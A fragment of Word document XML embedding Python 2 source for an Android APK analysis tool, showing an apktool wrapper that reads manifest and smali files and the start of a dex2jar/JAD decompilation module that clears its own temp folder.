      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    if os.system(cmd) !=0:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        return  0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        return  1</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class APKtool:    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    firstFlag = None</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    lastClassName = None</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def __init__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        print "apktool 2"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>#       self.successFlag = Global.FLAG_APKTOOL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.successFlag = 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.firstFlag = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.lastClassName = ""</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def getManifest(self):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        if self.successFlag == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            print "apktool fail3"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            return [0, ""]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        print "apktool success 4"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        path = SYSPATH + "/temp/ApktoolOutput/AndroidManifest.xml"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            data = open(path, "r").read()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        except IOError:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            print "IOError"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            data = ""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        return [1, data]</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 get the smali codes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    def getSmaliCode(self, className):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        if self.successFlag == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            return [0, ""]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        print className</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className = className[1:-1] + ".smali"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        # this is the first time to call method "getSmaliCode"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        if self.firstFlag == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            self.firstFlag ==1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            self.lastClassName = className</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    print os.getcwd()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    print className</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            classPath = os.getcwd() + "/temp/ApktoolOutput/smali/" + className</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                data = open(classPath, "r").read()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            except IOError:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                print "IOError"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                data = ""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            return [1, data]</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 if the lastClassName is equal to className, the smali codes need not to be updated</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        if self.firstFlag == 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            if self.lastClassName == className:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                return [0, ""] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            else:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                self.lastClassName = className</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                classPath = SYSPATH + "/temp/ApktoolOutput/" + className</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                data = open(classPath, "r").read()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                return [1, data]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRDefault="002033D6"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2033D6" w:rsidRDefault="002033D6" w:rsidP="00BF5583">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc406756519"/>
      <w:bookmarkStart w:id="96" w:name="_Toc406756632"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>JAD.py</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>import os</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>import zipfile</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from startQT import SYSPATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="00D5261B" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># Modifications</w:t>
      </w:r>
      <w:r w:rsidR="002033D6" w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve"> made by Valerio Frankovic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D5261B" w:rsidRPr="00D5261B" w:rsidRDefault="00D5261B" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># System calls were not suitable for Windows OS</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delete all files and dirs in the "./temp/" dictionary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># return 0: success;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>def clear():</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    cmd = "rd /s /q " + "\"" + SYSPATH + "/temp" + "\""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    return os.system(cmd)</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use the dex2jar to generate the .jar file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># Then move .jar file to the "./temp/" dictionary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># At last, unzip the .jar file to "./temp/" dictionary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># return 1: success ; return 0: fail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
